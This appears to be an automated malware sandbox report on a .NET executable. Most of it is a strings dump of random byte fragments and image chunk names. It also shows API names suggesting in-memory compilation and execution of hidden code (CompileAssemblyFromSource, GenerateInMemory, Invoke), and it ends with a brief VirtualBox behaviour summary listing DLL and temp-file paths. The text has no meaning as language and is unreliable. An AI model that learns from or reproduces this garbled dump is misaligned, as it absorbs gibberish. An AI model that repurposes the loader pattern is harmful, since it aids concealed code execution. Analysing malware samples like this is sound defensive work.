2R=9B
<R}Ljg
>4C5
=h$p+
M3<gU1
YsZV
93o=
Bj0EQq1
/4mt
!W-G
8nz
1*>5
RhyYw\*
Iug#
#ofB*
RX<u'
3zjq
x64d
E=dc1
REmu
2H F
ex<^-
$QW_G}}=
QTT
FfV&
SUR6SUR
1u4+MK
V!:}
\/ \~
2ICY
~u-WRK
(. UU
F#7e
UVS+9:8
GFfL
#usg
DE8]1Vl
8#E!;
A?K"
UPQVrj?
G!{Q
{uCvq
4]]=
3;Jf
9tuu#-
A__?FFFq
j6Pv
{_c8
s4VE
nm+mO
Qcl[
;(-)%
rB#
*'WY
-(-\
J{R
#Strings
_p!s
qE\1
BP^\
_BTU
n}])
PR*:P
p8(*ra
tch!
@2yk_XG
OPM
c{=.{e
ahh<
YT !
>.v2
?Zy
\'2t
`wdU
e!p1
1J"C
ZUhD
I0ZN
+d$d
0\\'
='Nh~
2J!02
fW{=#2
+W.gh
Sy?#
zslNb\X
"IDATW
CompileAssemblyFromSource
dnX/
tU9
qtvo^
System.CodeDom.Compiler
0&c6
?S=R
;a_<
"u&
bxas8G
ToLower
ROT>
JDQP
8RfJw~:
TJ E
`"TLe
L&K2
efN/
E~b$5
% f~
/ix`
A@cc
5FJ^
g>c
_\[9s
CkZFu
+ZAV#]
3sC>w
{weF
L>Q$
U3;k
E|lM
<#;K
V9F{
yu50
Ul9rNm Q^
^d$5
OB>Y
$Kd2
3%H%p
2;1R
!PmIs
=p6f
gvvowoO
a5
/L:6s
#FQ>
qji%_2
}TUT2
D9wf
0(\F
ieV%
.G7q$
{JxSs
dH,+
?w^{G
]+z6<S2
mli
ZW=\
|a5a
b*?(S
q%";
bA^^>|~
|r|uY#
Xq l
G2!Uwt
I0;Xj
^]2df
} |4
ToString
JWs)
K77-NY
!N9- q
Nd*n-F
).*a
L8y8$
y}EL
QQ.B
~F$U
RF1E
?D*c
ujGZkJG\+
^}Aqj
LgMa
qv B
w}G! |
=AL
6M h
H/7H
^^]
(]e_QN
\\79
wph$zsk
HX
VcCl
7z9_R
pq\Aa
O+%p
ptqP
[]Y'
0 y+
MVb
1(lI
hhhR
-! >
nJX.
bQ[CM
o: d
%*)q
AYpIr
"Eal
"oqq
t:Caa
S/.
[]Y
*<*y
'8?F
6EB#
e}3RQ
#HgL
=32,kd]
args
mcC
e]]M>F2
<gJ}aEAS
Fi30$'
L-$!
q<23r
DUU,G
EZZ
^^\m443
*%6Z
v{zRa
J344
\WTv\WT
&iNOsYD#u
! YM
, od)b(z
PO%X
}cgi
!\id3
`JNT
3;]7
Z[Y2
Z]NZ=
LK#5>
B2YC
z{;YKv [
)!u.U
kmJ>
7/FII
eF)1
K8j?
{TqI
r.#
pom/
FcD
!Op:~T
caVp
jML>
(N>p
FDv<
Tvf:U
Ec12
7< :
WYUk
ikkg
Fx&<t
.N&
SQUcl|
n@
Kw0qM
$Xm)
0,|<
^B<U\
O).Q
.^PE
.)++
JfnB*X'
=9 }1s
$!hsN
_2-0
m((>
lPpo
m>,N
k*//
^:^d$
nAckg
HVw4
%HJ5a
QQYI4
Z[YY
tvvRSSCSS
.ctor
][V
Yg\2
,`W\
SmnF-
<O#|'
6acG
V5tv
fjkOq
%lho
r{fK
0\;4
K gv
SURERTQ
[<^W
r\#
uMQBcTw{
zslP{um
)%J*
=:(m.,
BRQ
Invoke
-S 4
*myC
&`me
H~?
4j?U6
H?@m
UzF'
$n5d
JG4C
47l6W
v4.0.30319
UBwWE
5!AsM`
`TwOd
VkE+W&
"1->Y
Y4 DM
/)iY
vvQM
T|0D=\
fT7TB9[
#(:Od
T"!n
Ff3+
x^_P
Z)J_
(yR !aOE/R
xdgg
j:YP
db_7
j6d(|
sU 5
li)wgD
3 <,J
w_|G
"m9Wq
F"uR
R I
hT! L
7AUGMk}
U,L)2
XR#:N/
6m:tYay
DxA`Z~
dbM7
>9+%
d2Z
sh4:
@.reloc
z`1tz
SKgF
BU@=
g1ct{
:t|J
>"0w
gSW6
n:FY
G<;FB65
y..7
G2PH
2#s$
dsNz
E(.,@
going
:8(
G?>s
pfp
ioFU
K~ub
`0H(
5V,i+m
N<_!,
osmM
5T9d>Q5
[k]O
V{4J
J"::
je^&ysl
KHsG
bU-F
6Z]-2J
dm O
^_]PLMK
[ P\~
ppG
KQQ1
CvV&J
Q
twuQXTL]]
K o_e
c ^o
&n!DtYa
Xt3L
?MR8r
Q5mT
pjH&
v #}
!=2+
@ql/?~Zw#
g$Y
E/_g
fK#fI@
/GTRQ
L&J<n
YxDFG
0(+-F~n
)--#
L$F:
a~K6R
-oikGu}
jJs~
VWU+
3'T G
X;,%
^xX<
Z@R4
?!|4g
x6$t
>,{!,
p!78
a4%_;B
"v%,
=au?
l Z
XWXOf
eZcW
Z;cY
c17'hv&
1YO
Bb?i
get_CompiledAssembly
w:v~
g-yj
GQL{
!1H|
g*g%Ei
Q'?D
%)o9
]p "`
RuntimeCompatibilityAttribute
_8R(L
KRU+y
-mhlhD8
Ekk
sMKLog
)W k
wS+;
*B(u
Gsvo
yHKK
PO5v
z)mA
Yf ;
O!fB;
KbsY
_ZwV
b~(m
bS~?+
kyiU{
@*4,|||
Mc``
l{Km
^~{w
4uZo
~=s:
/h.Oj
k^
g&FEIk
YZXs##"
Dr'@
X?Z/
u U9
[@>i7
3~@A
T`*%
!(Qu
k@T%
nNVv
uc4U
O4+v
wph.
8 ?4
BY M
1MTY
set_GenerateExecutable
Ga3w
%`5Y
"G]{
$Xx'
[3>|{8P4
Mx-6-
k6u.
go:G
Zrdb
d>j2
YhF-
e?X"-
(**B
C7DV
,SVV
QSPvPQO
2R5#U
1RnFt
Ck `
i5|(Rv
d`s#XM
Oz>?ns
>vFu
Jx y~Kp
s&BF
<(,(
Dkm
~G$om^r
FqXY
YS
NGG'
k7l9
MB@bG<;
#&f;
NPM OQN
%'C1
W\Eqq
vD^f
J;42
/`Nwi
JaA9
o?w{y ?vL
M\'Dy
!#ml
Or=k;:
Z#
]R#5
L0@H
}(GQZ
dW0 G
jy"d
K #x~
]m1!
>cN
tPzAZ
6d-6
qN6d
G@@iD;
l1ip
k]8D
PHuH
7BjD
>*('ql
=)aRs
W3W
Zw"U0o
6hj jc
f[:;9c5,i-
W4Tqe-
}x_c
`afX
sDlD2<
nW2n %I
w-G
$b4T
(CZ{
l49>
Au]L
ki 8Y;I
]yc
2S(y
c<;B
.80A
;c p
`apR
w(G\
jV_OO7
g $:
zf{}k+}
uyh]
E%@f
|b$.5
get_ReferencedAssemblies
Cc#{-!
4x=M
l{QTkH
@3B4
Cp-
x|#z
u1@<
^_]M_`^
twu0
!';
B6 >
0-ymb
%]'c
]]],]
|>TU]
Xh\
szyid
*( (hPQ@
yL:V
CP-5
o9J )@J
F n}2
`q]]
QGD+LB?~F;:
f\)e4
bt G~
If{E~
MC@ I?=QE:9
hF 8~L
JEX#1
F|fZ
-xS~
rZ_)n
A <
l{gm
bbN1J
Z\Y^..-
%YYX
aNgNKLcM
'^Cr
outa
/Qz<
{@CA
=lAa!K
J) aKI
]^[a\]Z
OPM #$"
v* 8
^9P !
}Vi~c
pb.d
LP[[
{xhQ
eymk
hF/TI
r=ex
CodeDomProvider
"X >hp
vnk
=2OH
?xhR
emPn
>/|$
6TTL
5tuu
1~w!9
{i]$d
{N%=
:D A
zV i-
M0Cv
%NFU
?uu ZH
%wFf
>VNzP%
|#\jk
i>R
2/
] b]
Q/[M
9DmA
w:C6
um=+W
"_;)
Jpl?
T QZ
co#<2
(*? I
Z|I'
<N/G
A P@LPTY
BJj*
<HY
RZ%m
{^[M
1Y ~
XRSz}g
&33Ls}
j1[p
dJIcWr
43yA
<Module>
\WTd[WT
3KVE
r i%
d*CQE
n&.\
#!@QQ!
OVPPl}
]9=M
3g8SW
1hcmi
_U@}
=10/9/.
v.% n
B4rF
rxMk
*08:
6#0$=' ;9F
zNL80
N;sv%
ii<v:
7-+UQGB
V.!9
^/ z
;E>w
_'uj-
q+T__
4e@<o
4Kv
MNL@
%qB{?
NF=dI5h
NPMH
dDNN
Na}
NPMA
fryB
0ux
*IA/D
xqi le^QB:8
NPMQ
$ud4
n^e }
\/'B
}V@
u57T
<*gTb
x}q{
MB@\OEB
_C.|
&;P-
X9dBo
0U{~
u4
CS[P
rkcRrkc
i&wK+
ry1:: A
gej~
gAMA
ZCKk
fu[xZe%
.0 ?
i2p(
P} \
p Zt
:R!
YZW ''&
**)&
A\q(9]$
Ceiling
k?D[
*UgQ
{'B,
mscorlib
xoT)6,
]6M~eY
&db H
?-k-
C]]-:;Y
/A9{J
`@UIC
JAJ+C
42IlD
= ##
jI9,
_=aQ
gPMz
9\J|c
set_IncludeDebugInformation
FN]3OB
7:o
{e9m
i2qR
@K<?
V~+(
?0g0
[3?z
^_]]_`^
[@+$qx _-
"#-
Bgk'
i2qF
<T!d$w
L&#n
g+Tutu
455#
<$ 9
YL+k
QZT^
+LthHE_
dJ`h
EQ8y
)[2/
G29HkK
z$Bq
OOM'
^^\/
System.Reflection
h=!i
e/yG
3a4 [~
#G'-
=r:^XI
BfsE
,Q^^
QSPmPRO
.w\:
h[?#m
FxJav
/=7AP
8 uJ
gc';
}hjjFKK
z&h@
himK
kimm
:d$2
8Uxp
%()-
OsMd
i())j
:@5\
=b%Oo
ira@
aZu5
wcSyF
uQ^&
qFaj
/nv'
Zet~ax
7Vv-^
ayh
V6$R
[ ;\v
1'Z[[Uz
K)nSBL;^
@ww7
x%72
iSQ6e
vn{Q
-a/H+s
yP%5
:t B
3!T"
|7Yg
y@Sg
h:q
[(--a
.jf/h
QRP"QRO
OQN5
OQN
OQN
i^f<
"#U-
?.p4b
WYV<WYV
V w-
^RP2
~WYOU"#
0 rX
HIIEff
Bolu
string_0
up-Q
32Rw}m}
|>/jj
%#_p
{o~ys
*fO@
QTE|2\
BF:~
yF5:
zMB+,
\v[j
H_W
1z2bh
1iAHm
EB#kpfL
Q)yHd
3RJ
V PQ
tp[
rd+
{EQx
J?>*B65
{Q{w{
'j+w
n. p
PqM[ \ d8
ReadLine
5YS'
I GZ
Cl&X+
31/(
?rXu
' IR
l
\2Ad
v#c$cTw
e$Zxw
SlQp
lg@x9
xJx@@u2D
?{7h
l}z3
c jll
,j9l]
B94v
S'e7
^O w
oTK'
*Sz'
rMt>
l*
g`OO
IQo.m
Kl{X
,CL4Un
o_fV
J nBM<O
X*M,
mscoree.dll
!This program cannot be run in DOS mode. $
Cn^.f
2QQ1]
4D#Za
File
NK&6
'Ikg
3x[(:
r{DC\B
?HGO
;+[2K
3D3m
# Qg
-G3\
jh*q
xtG6&
Hcc#
L?8|
Pt'O
]t {
v}BE
xvX#
*2 yE
,SYY
7u:?
aCO{
2 [N
DC~Hb
M(M88
Qnh:1S
j^jJlL
~yr*
set_GenerateInMemory
wPQQ
,lk}
v0"?
<22,
D'Fi;
;G-%
b1^ Yl
5WZS5
yP }nc~@
$.c
liZh
<s6x
I0uO
#yDF2
~q"NL
(ouzyep9_
UjD::
rz=mw
o$S,
]`N~
2LU1
nhk
B1U>
yVWX)2
nt_h"
%4l
R^^Ne
OEC(H=;~K=:
_mY2G
d wj
qVkW
$[g(
BKGMS]g
,V+W
3uul>
_FZ"
aQrAn
O1>1
0r_!
jBLs[
E*9V
zDX]Z
BSJB
$s;T
OTWW
WmsM
X`X_Z_
*&"hj
L![ZX
@uji
z{{>
GnCx8
a%;D
?!h:
\a~'
7!rH
H&(.*&
C u&
--R
F~\G
TVSUTUR
y477
GiUi
8"DG
baP=
B AIa
1Z?E
qMH*
64fgC
;h.K.
^Z x
ef.>
w`tU
/s;SW
K[%z7
rkcerkc
mp8: I",
IEIZ
0
}H%5Gv rx
iesb$
eAfh&
'(j_R
1{eb
Zhnn
^IY
&G]O;
KV<u
i98$
Ff G
fEgFf
System.Collections.Specialized
o$?*
LX(7n
O[%>U
jx5b
@+fm
JPZQ1M
hTD$
)-0s
yOt|z
Lwow~
}/y
_S|-
}z.s
m3<p<
2'~y
P6Y'
A%,58]
|RmQT
(94)
iL_&
Jc%q$R~o
^^\l]^\
;gu7
XwH; :
b7dw
s}>t
KaQ 5
@0lQ
PR
< +3#
fEIQ
~ISe\
^=G50Vy
S^VFgg'
unf%wpg
sjD+'N
t7vW
_Hhv
Xzzz
,T%@
NOMhMNK
s>0^
RPzWI?O+
grw|C
.3l
NDA I><TD87
MOLW
FQUB
(3A7
,}#{x
`sSRfv
zH!$
+9&w
$Mzo
!h4
Hn#u7Tc
H$F4
C5zD
UVSP
\v+N
Gk<x
iBRZ
T46w
j*u+EFry
1;?B 0"+
9$lG
>.Z<;9
7 Lj
He^x
9D08940x9AaLl1so.CIL
o2%F
]bGu_2
UVS3
A)|W
1%PJ
/*xgj
~ U
L%t~
?D5|
{.Mvt
D&\E
e}eO
_.-o
3"O2#
a~Bf<F=u
B65g9-.
$)MF
hNy1|>n
jJJJ
=4n.
aP^^
H+2#3
(?Eg
_eN"
JKLK
u6?[,e
MethodInfo
w \g
7S^Q1
WUR QQN
v/Z6
{Y-9
&> "
IDAT
XYVM
haZH~wn
&#EN
RR?#b
UVSqMOL
y<66Fee
lFm]-jk
Ne"@Oo
mZ_8+#3
^ Gq
ztnP
eb3&
RTQ^RSP
Cj*ka.
|0Zx
w "h
c;fp
$K)3~,
}C51
RC u
f"#-
qA 5T!
OG W7
#ZZZ
v{:222a2
D_O'DQJ
>nn6
Yavy
wS\\
)oDH
:d%S
/$Wj
l0M>I
%F/n_
nOH?
__%L@v
PQO6
IDATr
e~S
K@>bB87
=@uJ
u8W"
2p.Q
TVS@
U?d"
"f:'
N###
8!]9
GMu5z{{
&fKhj3
b}#F
n[oE
.K3
$ {Sr+
ghkk
}'f-T
>[rK2
6)yh
]^[!
wcZ7
sBWA#d
P_G*4
t$+"
^cLA
\CA=
|Xhw
E MM
M2
IEND
MNKO#$#
b9aO
F?I.
7 ++
n/e53
ld/d
&}cc
S+9r
+Y m
*K2LPF
I|sS_
J"FZ
\[RU
&uH~
uI\?Z
/5iF;
3pH\#
hGmM
qB_k3
iIJn
}kQRR
;w_Thy1
te,02<
`[XT\WTLSOL
AV/R
3g wRy
!.r
W 3j
d~gm
r</ 77
C t5
q%b$
k'Ik
+(N{
',_nWT@
BWW'jkjP__
V!#=
cl\\MgX
#{2g
*^r
\ 344
4C%_
t1f:$W=
=2F*
*8~=
CSharpCodeProvider
"jkk
F%L7
6^@H0
rcNJ)<c#
3ezTq
WXU WYV
wexO
#,cU
fB"
OME6
gxxx
.5&#1
r0Z_
:_"3
!0A0(
@=^I5J^Uq
Eu
9A>.
.jOg
=NT?R)
;Y,F
$+`m
%2Q8C
SKG wphW
Zv8h
*5vM"(
FZ^`;@
a922
Zv h
#; e
]A%y
mHoL
JJ:{
aqyU}
7tr
wau}
;Y~U
@9|25
XkW(
*<e1`t;H
agtt
|lc7|
x|Qk]
C`tt
yIe.u
2[rrV7
]^\y]^\
\OD^
ihXKoo_
SY6a
M\i$
<^Dv
~up>
G$kb
F'Uz\
N{K;
R,D6
0mcB
5j&MdFw
H$4>B
jcBE
(=#A
6 GE
7?"C
[ma~
FO.GF
System.Text
$ID"a
!.45~Clg
~nl.O
_HuH
RHE*G<:
NSF
E9\P<&z
Ia V4
TM>b
_}:n
9TWU#
" q
9kAVu
#5p'"#
<O9q
IJ y
]A7m
4 FZ[
3KGl
Xhrd.XY^
#&FE
fMP=)
.axd,
r:Z[
Tg]g
=s
&~/2
iMfJ
0r$+L
``Fu5mm
Q&41
0^L/
TURf
f X`|#2
?[r E
Za~`u
RSQ6=><
GE#;
f*r2ENV
on+k
oZT\
J?{Y\GRA
%hcH
U^kC
+eNP
B[;9
lX7s^i
< Z
bR#:2fC
:fw(g+
.2rJ
#}hz
|eL:
LC[/
p~I
*Gp[
? vt
zdxdQ
t.KK
:YL=
+Bw`
>sJrY
&d?32
J?<bK<8
A65G>21
Wz(S
wphCvog
u Ij
eZ]9"0
`0PT
k 2~c$k[
QRRBgG
?@Mm
UWT~776
65(W
g)%B
+Q\W
~m K3}x
tw_E
^C[(
PROH
}7rs
Fc3?;
kZi
_}P<
_CorExeMain
+xAW
;G3Y
QGD LB@TF<:
_xiMii
_Z 6
~:/Ek
3[$Z
PQN:
FHQ%
2 U
Y K
G"3E
QYY5
O322P^^
71os
zY_f
'#f?v
[3Yr
%!m3
=]-a$# $
N{}]u
DebuggingModes
NDA&J@>zC98
w 9h
TUR`TUS
]6'mi
Njjf
CT-5
}y~{q
h Dc
^vM[f
RTQTQSP
"3 ]`
tbll
#{8om]P@
T`Kw
6{H<
UQP>
D1,lG
7";'
yZH*
mrof:n&~
(v{b
{{85
9-FEd.
VXTr+
\Z3^
f;-*^
zs |wq
HSRK
t%h k`mcgwS
CycD
/XC9x
{"tCF
IDk;
:dHC
dQe0
NCA\LB@
-q>~t=
H<;c>33
y Tay
$KLWwe
,{43nR(y6
\goc(Yf~
izWf
CompilerParameters
jy\-
J!)1W
MC.8
TNIg~wn
dy%@
,${ B&
AU
#)fs
FFD+
LVazu5
>?L#v
g %g
^sp4
8UQyv
v]!t
\K{-
h]Y"[
`PsM
:R,m
Z3'zy
}2d&
#uK<
5)}rzOfj
+V244<
' /e
yrk {un
xRXGY
cUgI
> J)|>
y0#5-*afc
V )zOf5m-
Z{W[y
MDA KA>QE:9
3b+u
?:8#)
@ a{
;7>E
Z-8q
_|>
rHe'?91
y|k8
6>gUg
|.q6
Qn3:
eC5D
ToCharArray
c)kR
U4z<
{p94
QRP-
AFFFq
tuw3e
9VW3
ut4g
^oKd
DebuggableAttribute
IIEm
\Y e
23NQ
D97)@54
Hq6'}
^Q 9
:b E
dCSG
li\Q
Reverse
FY6da
?[oZ
oXBp\
$3YE
).LPQV
&qGa
w}>r
+W`4
$}V>!
3wi9 _ks
xE"1
pXO!
dJ YC
R' 0x
]-9'
H4;65
"#}
bxpH
='6%
Hh5U
1! i
%qmYkne
oz2*
fSgw
C jk
R#yR
C~52
Wkt%P
|vznjf
;s&i
g+RR
h4j~
!cGB
F\?T
1Rr*2
jkk1<
N]I0
PQO-PRO
8:xD
Object
;DJI
pety
gC*$
/ |E
]][6
]:0
.Z<"
hO^>
L<.2
o"4Ol
g:?u
(q{!*ow
]\\LQQ
Sm3ZRl
Y} P
M |q-
*h>~
Qh F
&S4V
*;k
:-7%
]F(0
j[<[
\]Zk;;9
j}]f"
^p6w
G{{;
e~O@
EF"Oo (A
0z>#?
iX=sy
MGMM-*+
{c{mBw
.G;(
ddhh
W oB
8s#Q
slT-
S p<
qxg<
Sa),
*BpMW
,mk=!
CWW7
]?;oYQIeG[
^{-w
()H0}
jq0:::%
iyBh
F'Yt
&B8
{d$=
"cFU[<
%6B5
fgR]
NKH(
TVS,TVS
^{-_
bY[a
EQD$
:Ph?
(++
F3YT ~"
nA-%
f[lF
>4vKKf4M
+}I-Gu
D8#h
l6$1,
sL%u
iT@y$
(bK/
IDAT#
:e(4
:/5
!DU
&*^(
(%)+)`
sRGB
n/67
}|yv
]-C?
^o ^o
+;@
WjXx
B*<i
yc_W
QYG;T+
hqZ
O%a[
(++#
CompilationRelaxationsAttribute
V]M"
2sjQ
D!J8
\amN
o!pFdg
}{y3
pS.W
LC+y
OPNWNOL
Fcc=
z+q{#;9
G)|m
NY @
~HyV
##%C
h*C,
)P$$M
~{3!xQ}
|zd4S<
Zw]<-Z8
""@n
0N?&
@%-M4
D8- $
E0;5
}wpOoke
ir+'_?
gV>Y
Q91P
J~te
q4!?
vD"a444
6zd U
: 9R
>S*P
2u`R
KK}c
g6y6X
][NI
E ==
D:*H
+^AF`?
wT/Z
-%FsYY
9o6y@
;]x=^
:gS^
]"#5
>UBE
DECF
]^[q\]Z
Dg9|
CbOSv
OPMTBCA
!_;d
t9;a
1}wW=
DECU
Replace
-a+S
t}W<;
$ uuU
9G<6D
GNuM
qd/<
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
sf,ip,m
34bi>
OPRR
)).Cji
q|\}
]kbK!
I5;
#Q_$
knkyYGk
\4LH
(bpp
fCqq
c@g<+
IZ[[
4g;|z
Y z&
#9+N
?[^\
DilP
]X6K
OYN~
$v?Tk
i/{7
Oq%
OHZ|
7):'
Bvd+
?_^X
Ya 2
jYr)
{!8g
~Vui
EOAF
897K
J{cg
G U3\
C/*
4iTTM
#M2R
VM5N
3' e~
{ I"JdaP>}
RHEbLB@
(IS*
eq~~
Tg{-
bhd4
GjMO
3McE
On=p\
tpgO
f3n[r
` gG
l08,6
d4w'
Y8
x]G,
MNKaLNK
<1Rs
<;zC
h5Y}
8n D%
RQI5
AQq V
c)lH
{RjB)
h2jE@
Sqrt
<+{n
P+u2
Qm}H)
1G`L
R_Z
2(-^
"{d}
b!Df
^^T%
mOf8o
4C2x
3!>cu
M9`^
V3##
oJCl
-*0%
UjLP
>DG
nj' =qA
-Av*
KO-
42R
}Q[
G>tK
\Toro
v]:~
z~mL
1 2Z
q ?J
wj\V
!3+ f
sv?zo
%[vU
h)$M-
X;r`6
dl )
=0ec
H}}=
"MI@6
VWTdUVS
ue;q
2:;:
6uw:
[h]k
u`u{|
lf]|1
Ak)#
L=o&
[Kph
$1R@HP
nLIn#
e'}<_(
@;T6
7o.UU
IFR+
?%>
__]AHIG
4?eSkYz
+t=G
){~X
uAWK
)fkZ
IDATx
M2T5
fnX3{M
?)03
Z[';
Lb*X,
a)hZ
#K_R
uu
#%`O
{o~
#E D@
E5+< g
lhb=
&(
\]Z(\]Z
c/eu
rldHQHB
%Pk_
64-@5*
i,G*6
l]ya}
F A<
L}}=}
r~'q
!n;-(e
{LyE
`kXVg[
Y 4c
!_1$
T; )
yR|u
)8 0R
\ED r
,e3N
" FA1
{h<{H}!/E
&]F
8sF3a
DxA j
zsk&a\Xj[VS~\WT;
6rb|
u\qjg
vz"h
TYF)
TE| g
"#).
T8@z
JJ<_
f5S^VF]}='N
0v.3
ccNTVN
't;D
+ UiL
CoT-u
h&Bvy2
IDATx^T
/PLCA
:fyTU
|62.
\gh~
kDKBiw
BwNgF@
cO #=
lsls$
68VvS
7N4 m
Zi!j
+D_!
X} 9
'K2G
j^\T ^
L*I6Ew'
~6-Dx
f@QIBM}#
_Q>*${ny
y= :
qmUo
nUiq
u( b
{,D
y- #
p2Q~hp"
)S; t
=/Mkk+
8vA!
Z 586
}&-]
Q3(GC
E6Nm
pxJ*v
V}U-2
8E:8
#Lug~'1
zVSHy
cLjQ
SR#9
b ^y
ZSn
@3vj
5d.=
'ERC
u0N~}
Hcyw
xB"X
8Dv}
@__7
#oD -+1
nj`|
G k\a
jkn*[
5! m
w1u4
IDAT
qd1;*\
nnzI
bR?d
k [!
aw`
1+CuTS
dW)_
?Z :
\VZI
2uus
Math
XF.x
PFC)K@>~C87
!QoK
0;wnG
ui49Lt}H%f
t832
HhU'
UIet{
&9N;
F)/B+Z
9D08940x9AaLl1so.CIL.exe
DEB8
~PL*
4M+! U
86[Fw
]CBA
L o
_`]3_`]
WrR"
)LY6
uX /8
System.Runtime.CompilerServices
y6PGv
f^
+Q}R )
,M*ix
@"3.
Wn($
-1RJ
hM@_lg
t:QZ:
QQVdM
FF51
n8(C
bFFF
fSeg
@h<<
c}I%
K<"2
%> T &z~
ftfw
hjj@nn>222
nK p
~ /'
E>r&
?#'q
DYQ
set_CompilerOptions
y6xqv
(JPUZ
Xa|&#$
7M,Yh
",FC
\VPCC:8
C5@ ,
uq]e _
mr)?
1 EV
~Z"]
KgG'R)
| wA
yb5
tJ>X
Yye4
.GU=
ZIJt
=}^J
S}kP[
Gt9>
u ?j
`FNH
c| Z
)))X
/'<D
3qp[
E#^C
)))I
Uf3?
p9b[
slD
QPMwMNK\
64ahX
'2<uO
p)m
y~001
WFRq
YJTC1
w6Pn
c` U
k_ U?
1z+E
8
STRM
)j)=
sQVV
S_N%
`Nk
/h[ @uI
4d8x
xeTg4tor2v0{L
2Zot
KH=d
[RZg
C87 ?33W<0/
u47f
-&$FA41
m Q-!
uj`>d
E#h{Q
idYb
2//][
L[Ps
M+GY
-aB!
" Ev
wc/
EbF;
cRu5
~Nu@
5 !G*
d2144D
r,Py
rD_6
-CgK
Compile
*FqOX
{rf[
zf:P^+
WXU 564
Ax]~$
/'pQ(
\{2$
3{MV^
X(H#
yAv=
rVfW
z-?L
r 4Q
a4
kS>3
t6}#vl_Z
d'B'Dk >
0_6h
4Qds
QK%~s9IY
jbdT
6 2
(.~s
dBXe9
*aqG
^5mn
-l9
KII RJR
hgg;
"Wjy
jrwj
<!\0
k)AO- u
,AQ6!
:?4Hj
7iR`K
@C}=
Jv#$AQnT
&oI6
1JqW.
QC h
m/{a
6A[`
iPzUZ
-xcg
#GUID
sld%tnf
~>C-
Mr W
td Z
4V76
\b7q
(P1m*
mx^"i
4kIDAT
X.ezk
MB&K
f{{kj
fz *w%
+QQ>
'u5A
rifH
<Hcc
oCff&
L&tu
SZV L
n}zw
(KZ;
4R3i7
Q]:1<
o,f
[D"Q
iQj@rtJd
E?{
gI5J9/Q
r;bd
yZq3
GF>N1x
#;?L
I><+D98~>33
r+m
nAE~
* d$
uyNp\n
.}WcC
$0.1
0(\Gk
&*Fr
OQNvOQN
QTNQ
x<*/
@}C=
LB?(I?=zC87
rYyHw
I?<aM>:
sCzk
&*Fr%
++[64&/
-~[.
x"A"
G* o
uk,k
&fsi
2r$|
*|ff
q<>^
6\s N
B<sq
1H!1h
KF+^B9v4
#uvp
Y&{N]|
d~u+u
,Db|D
{y99
&38
Encoding
).v7
I^ c3b
{Q1Iy4
o9.rQ
ue6WL
g"+3
Egg'
m%Fz4
h PYq#
q^IM
il&-
x<^466!33
=pB
AQP$
o 78
+,PU
i/,a
cgW`Y
#&B+;F
.kGQ[~w
./m]
amt<
#GF<
O*zb
C+v+ ;
lTW_
1A\1
TJGbMCA
:3W:
a(+-
YR k
IfdH},*
YKR2
.O\|
T )%J
v>/0
pF+7
;Bcc
Tb i
#eee
`g+q
"~3Ux
(KUQH
GJ2Z
A{[
UG\
(<fR_
$DU"
\hmm
^H{2
^CuV
A`kooS
\RQ!
E #p
n+Me2HP4[U
jX*2
G(v1
xc(40
l x ^
[{ g
G[[+
je|=
P0T9
AWO_
1RMQb
Mc15
lF5PR
>T17
<q --
NOM3
obtgb
}Q! L
%! @75TM?:
H+wT
7nVN
G" #
STQ"
RTQvSTQ
TMT
@vPev
#mr_A
TMP
P5p9\Y
_ cI
FGIK
LUL*
+=3(
]^[5BCA
75-n
e hy
bmjl`R
(k?Bcz
G3Jj
764$
#w(X
IF=q
+u<*
=c }
\ e?
p[xY
PExi
S\\DUU%
Rg`
{r+s+SsR
HxPq
VuC[
NOMR
{Wnh
*`}Gaw
>\r>
;bbn
Kn}
@FZZ
T#TQ~!
8Y\!
YJJV
3%*/
L\J#Xn
Ju4
3)EX$
WriteLine
@)w#3#
JP=. *|
!OX1yd
O288@*
K+|8w
\?k)r$
`ZUH
Sc}/
&O<;
rD1l
8,w
lS'P'
EkG=d-q
VXTA
3^W4C
<_^{&
\6#\
w?rj
jfa[/
^! Ur*
mO
$uz 7
_wvu
Bchilj$
M]e
:51?F:6
% b>;
phpx
L,.I1
x CU:%
^5b4
PFC\MCA
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2018-05-28 14:18:44 2018-05-28 14:21:37 173

8 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2018-05-28 14:18:44 2018-05-28 14:21:37 173

9 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\done.exe.config
C:\Users\Seven01\AppData\Local\Temp\done.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
